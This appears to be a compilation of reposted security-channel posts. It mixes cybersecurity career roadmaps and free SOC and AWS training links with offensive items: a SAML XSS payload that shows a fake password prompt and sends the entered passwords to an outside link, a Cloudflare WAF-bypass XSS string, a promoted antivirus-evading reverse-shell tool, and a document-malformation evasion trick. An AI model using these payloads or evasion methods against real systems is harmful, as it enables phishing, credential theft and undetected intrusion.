🦑𝐂𝐲𝐛𝐞𝐫 𝐒𝐞𝐜𝐮𝐫𝐢𝐭𝐲 𝐜𝐚𝐫𝐞𝐞𝐫𝐬 𝐏𝐚𝐭𝐡.

1) Security certification roadmap https://lnkd.in/ghvqfZ3z & https://lnkd.in/eFU8WC29

2) Domains of cyber security https://lnkd.in/eXsfxkTs

3) Cyber career map https://lnkd.in/evTUCgas

4) Cyber career map https://dsci.in

Suggestion on how to use these: ask yourself
👉 What domain of security interests you (offensive? Policy? Defence?),
👉 What job you want (pentester? CISO?),
👉 What certifications you might need (OSCP? CEH?)
👉 What level they are at, build up a plan of how to get there?
Thank you Katie Paxton-Fear for nice sharing.

Ref: G M Faruk Ahmed, CISSP, CISA

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New evasion technique that is bypassing almost all security solutions so far, taking advantage of the recovery functionality in applications. This is groundbreaking as most if not all endpoint solutions aren’t armed with any file recovery techniques and would fail to detect this attack vector.

>> Microsoft has structured word documents similar to archives, constructing any doc file with 3 sections; starting with local file headers, central file headers and end directory records. These 3 sections are linked backward starting from the end to the header.

>> Manipulating any of these sections makes it harder for any endpoint or email security solution to unpack and identify the issue, but recoverable by its intending application after its too late.

Ref: Chadi S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How run the Password Reset Flaw | Live PoC - New method

Ref: Rohith S.
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 The Official NASA CSRF Vulnerability Video

🦑 Leveling Up Our XSS Proof of Concepts at CybaVerse :

It's not uncommon to find a Cross-Site Scripting (XSS) vulnerability but at CybaVerse, we strive to go beyond basic alert(1) and demonstrate real-world impact with meaningful Proof of Concepts (POCs).

We recently encountered an XSS vulnerability within a SAML Sign-in flow — not your typical low-hanging fruit. Crafting a working payload took some finesse due to HTML encoding requirements. But with a bit of creativity, we managed to inject a script that could:
🔹 Manipulate the HTML to display a fake login prompt.
🔹 Capture user-entered passwords and send them to our server.

Even though traditional XSS exploits, such as session hijacking, bypassing CSRF protections, or performing authenticated user actions were mitigated by the application’s defences, this vulnerability still allowed us to:
🔹 Phish user credentials via a convincing fake prompt.
🔹 Demonstrate impact beyond simple alert pop-ups or redirects.

Here’s a snippet of the payload I crafted:

⚠️ <samlp:StatusCode Value="XSS POC&#39;;document.body.innerHTML=&#39;&lt;br&gt;&lt;h1&gt;Authentication failed, re-enter your password&lt;/h1&gt;&lt;br&gt;&lt;form action=&quot;//https://lnkd.in/ecG5926A&quot; method=&quot;post&quot;&gt;&lt;input type=&quot;password&quot; name=&quot;password&quot;&gt;&lt;br&gt;&lt;button type=&quot;submit&quot;&gt;Submit&lt;/button&gt;&lt;/form&gt;&#39;+document.body.innerHTML;&"/> ⚠️

The image below shows the entered password if someone fell for the prompt: “Authentication failed, re-enter your password.”

Our goal is always to provide actionable insights and impactful POCs to help clients understand the risks better.

Ref: Michael Jepson
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FREE 𝐒𝐎𝐂 𝐭𝐫𝐚𝐢𝐧𝐢𝐧𝐠𝐬:

✅Microsoft Security Operations Analyst:
https://lnkd.in/eKTXEmna

✅TryHackMe
SOC level 1: https://lnkd.in/enkunj-B
SOC level 2: https://lnkd.in/eg4znfJr

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Wanna Bypass Detections ?

🦑Bypass Virustotal detection

>> Narashima is designed to bypass both Microsoft Defender and AMSI, as well as every available AV software in VirusTotal, achieving a 0% detection rate and no high malicious behaviour rate.

This tool provides a reverse shell with unmatched stealth, making it an essential asset for cybersecurity professionals focused on security research, ethical hacking, and penetration testing.

💡 Key Highlights:

- Bypass Detection: Successfully bypasses Microsoft Defender, AMSI, and all available AV softwares with 0 detections including Google, SentinelOne, Kaspersky, Sophos.

- Zero Malicious Behavior Rate: Narashima operates without triggering any suspicious alerts.

>> Tested on : Win11 Pro

I’ve spent considerable time studying and implementing this obfuscation methodology and am thrilled with the results. Looking forward to collaborating with the community to enhance its capabilities further!

@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Cloudflare_WAF_Bypass by xss0r: NEW Meth !!!


>> Payload: <details open ontoggle​=alert('xss0r')>


@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑14 FREE AWS Knowledge Learning Badges! 😱

What better way to strut 🕺🏻 your AWS skills than by earning and flaunting 💃 these badges?

Here you can dive into what each badge entails, and YES, the training is absolutely FREE on AWS Skill Builder! 🆓

💎 Dive into Cloud Essentials here:
https://lnkd.in/gzYfiR5W
💎 Enhance Architecting skills here:
https://lnkd.in/gxQTERJQ
💎 Learn Serverless with this:
https://lnkd.in/g_q_mChp
💎 Learn about Kubernetes on AWS:
https://lnkd.in/g9h4gzEe
💎 File Storage expertise awaits here:
https://lnkd.in/gadMBhmK
💎 Data Protection & Disaster Recovery training:
https://lnkd.in/gX_we9Gv
💎 AWS Networking Core:
https://lnkd.in/g3u_JTfK
💎 Migration lessons here:
https://lnkd.in/gKaqyA3f
💎 AWS Compute Knowledge:
https://lnkd.in/gptkhZjh
💎 AWS Data Migration Training:
https://lnkd.in/gBjaht2n
💎 Get into Cloud Game Development:
https://lnkd.in/ghz4jyKX
💎 AWS Events and Workflows here:
https://lnkd.in/gEi78XcX
💎 Dive into Media & Entertainment foundations:
https://lnkd.in/gjHBP_SF
💎 Amazon Braket at:
https://lnkd.in/gGKHpQGf

Ref: Greg Powell
@UndercodeCommunity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁